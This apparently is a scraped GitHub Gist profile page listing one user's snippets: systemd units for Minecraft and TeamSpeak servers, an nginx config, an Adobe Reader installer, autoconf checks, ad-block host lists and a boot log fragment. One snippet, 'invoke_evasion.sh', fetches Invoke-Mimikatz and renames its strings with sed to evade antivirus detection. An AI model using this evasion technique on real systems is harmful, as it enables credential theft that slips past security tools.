Skip to content

Instantly share code, notes, and snippets.

@misuchiru03
misuchiru03 / minecraft-server.service
Created July 8, 2019 19:16
Minecraft Server Systemd Service
[Unit]
Description=Minecraft Server
Wants=network.target
After=network.target
[Service]
User=minecraft
Group=minecraft
Nice=5
WorkingDirectory=/usr/local/games/minecraft
@misuchiru03
misuchiru03 / ts3server.service
Created July 8, 2019 19:14
Teamspeak 3 Server Systemd Service
[Unit]
Description=Teamspeak 3 Server
Documentation=http://www.teamspeak.com/?page=literature
Wants=network.target
[Service]
WorkingDirectory=/opt/ts3server/
User=teamspeak
Group=teamspeak
ExecStart=/opt/ts3server/ts3server_startscript.sh start
@misuchiru03
misuchiru03 / www
Last active April 29, 2019 04:01
Nginx web server standard web setup with static files, html, and php, with simple http auth support
server {
listen 443 ssl;
error_page 497 https://$server_name:$server_port$request_uri;
server_name www.domain.org;
error_log /var/log/nginx/www.error.log;
root /var/www/html/domain.org;
# Enable php support (must have php-fpm php-cli php-mysql php-gd php-imagick php-recode php-tidy php-xmlrpc installed for full support)
location ~* \.php$ {
fastcgi_pass unix:/run/php/php7.2-fpm.sock;
@misuchiru03
misuchiru03 / adobereader.sh
Last active March 30, 2019 18:02
Adobe Reader installer for Void Linux
#!/bin/sh
# check if root
if [ $UID != 0 ]; then
echo "You need to be root to run this"
exit 0
fi
tmpdir=/tmp/Adobe
@misuchiru03
misuchiru03 / invoke_evasion.sh
Created March 14, 2019 21:00 — forked from PaulSec/invoke_evasion.sh
Small script to bypass AV that triggers Invoke-Mimikatz with shitty rules
# AV Bypass to run Mimikatz
# From: https://www.blackhillsinfosec.com/?p=5555
# Server side:
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1
sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1
sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1
@misuchiru03
misuchiru03 / glib2-check
Created November 26, 2018 02:46
Moloch check for glib2
# Check whether --with-glib2 was given.
if test "${with_glib2+set}" = set; then :
withval=$with_glib2; case "$withval" in
yes|no)
{ $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5
$as_echo "no" >&6; }
;;
*)
{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $withval" >&5
$as_echo "$withval" >&6; }
@misuchiru03
misuchiru03 / Yara-Check
Created November 26, 2018 02:00
moloch check yara
# Check whether --with-yara was given.
if test "${with_yara+set}" = set; then :
withval=$with_yara; case "$withval" in
yes|no)
{ $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5
$as_echo "no" >&6; }
;;
*)
{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $withval" >&5
$as_echo "$withval" >&6; }
@misuchiru03
misuchiru03 / youtube.adblock.hosts
Last active June 22, 2018 02:30
Youtube Adblock Hosts
0.0.0.0 www3.l.google.com
0.0.0.0 ads.doubleclick.net
0.0.0.0 s.ytimg.com
0.0.0.0 ad.youtube.com
0.0.0.0 ads.youtube.com
0.0.0.0 www.gstatic.com
0.0.0.0 gstatic.com
0.0.0.0 clients1.google.com
0.0.0.0 dts.innovid.com
0.0.0.0 googleads.g.doubleclick.net
@misuchiru03
misuchiru03 / etc.sv.adblock.run
Last active June 22, 2018 02:31 — forked from abenson/etc.dnsmasq.conf
adblock setup
#!/bin/sh
exec snooze -d 2/5 /usr/local/bin/update-adblock
[ 0.000000] ACPI BIOS Warning (bug): Optional FADT field Pm2ControlBlock has va
lid Length but zero Address: 0x0000000000000000/0x1 (20180105/tbfadt-658)
[ 0.000000] ACPI: DSDT 0x00000000CCF331E0 014F1F (v02 HPQOEM 83C6 01072009
ACPI 20120913)
[ 0.000000] ACPI: FACS 0x00000000CD3E3F80 000040
[ 0.000000] ACPI: APIC 0x00000000CCF48218 0000DE (v03 HPQOEM 83C6 01072009
HP 00010013)
[ 0.000000] ACPI: FPDT 0x00000000CCF482F8 000044 (v01 HPQOEM 83C6 01072009
HP 00010013)
[ 0.000000] ACPI: FIDT 0x00000000CCF48340 00009C (v01 HPQOEM 83C6 01072009